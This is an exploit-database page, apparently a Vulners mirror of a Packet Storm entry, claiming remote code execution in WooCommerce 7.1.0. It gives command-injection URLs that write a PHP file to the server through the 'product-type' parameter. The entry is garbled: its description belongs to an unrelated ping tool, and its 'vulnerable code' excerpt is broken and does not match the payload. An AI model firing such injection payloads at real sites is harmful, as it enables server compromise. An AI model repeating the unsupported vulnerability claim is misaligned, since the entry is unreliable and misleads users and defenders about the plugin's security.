Lucene search
K

WordPress WooCommerce 7.1.0 Remote Code Execution

🗓️ 31 Mar 2023 00:00:00Reported by Milad KarimiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 729 Views

WordPress WooCommerce 7.1.0 Remote Code Execution in meta-boxe

Code
`# Title: Wordpress Plugin WooCommerce v7.1.0 - Remote Code Execution(RCE)  
# Date: 2022-12-07  
# Author: Milad Karimi  
# Vendor Homepage: https://wordpress.org/plugins/woocommerce  
# Software Link: https://wordpress.org/plugins/woocommerce  
# Tested on: windows 10 , firefox  
# Version: 7.1.0  
# CVE : N/A  
  
# Description:  
simple, easy to use jQuery frontend to php backend that pings various  
devices and changes colors from green to red depending on if device is  
up or down.  
  
# PoC :  
  
http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.php  
http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.php  
  
  
# Vulnerabile code:  
  
95: $classname $classname($post_id);   
94: $classname = WC_Product_Factory::get_product_classname($post_id, $product_type : 'simple');   
92: ⇓ function save($post_id, $post)  
93: $product_type = WC_Product_Factory::get_product_type($post_id) : sanitize_title(stripslashes($_POST['product-type']));   
92: ⇓ function save($post_id, $post)  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation